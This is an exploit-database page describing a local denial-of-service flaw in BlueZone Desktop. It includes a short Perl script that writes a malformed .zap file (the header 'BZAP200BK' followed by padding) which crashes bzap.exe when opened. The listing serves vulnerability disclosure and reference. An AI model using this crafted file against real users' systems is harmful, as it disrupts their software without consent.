header-logo
Suggest Exploit
vendor:
BlueZone Desktop
by:
Silent Dream
7.8
CVSS
HIGH
Denial of Service
400
CWE
Product Name: BlueZone Desktop
Affected Version From: Latest
Affected Version To: Latest
Patch Exists: No
Related CWE: N/A
CPE: a:rocket_software:bluezone_desktop
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP SP3
2011

BlueZone Desktop Malformed .zap file Local Denial of Service

A maliciously crafted .zap file can cause a denial of service when opened with bzap.exe. The file contains a header of 'BZAP200BK' followed by 20 'A' characters.

Mitigation:

Ensure that all .zap files are from trusted sources and are scanned for malicious content.
Source

Exploit-DB raw data:

# Exploit Title: BlueZone Desktop Malformed .zap file Local Denial of Service
# Date: 10-15-11
# Author: Silent Dream
# Software Link: http://www.rocketsoftware.com/bluezone/downloads/desktop-free-trial
# Version: Latest
# Tested on: Windows XP SP3

#To trigger: Run this script, double click file to open with bzap.exe, program dies.

my $file = "bluepwn.zap";
my $head = "BZAP200BK";
my $junk = "A" x 20;

open($File, ">$file");
print $File $head.$junk;
close($FILE);

Navigation

Suggest Exploit

Services By CQR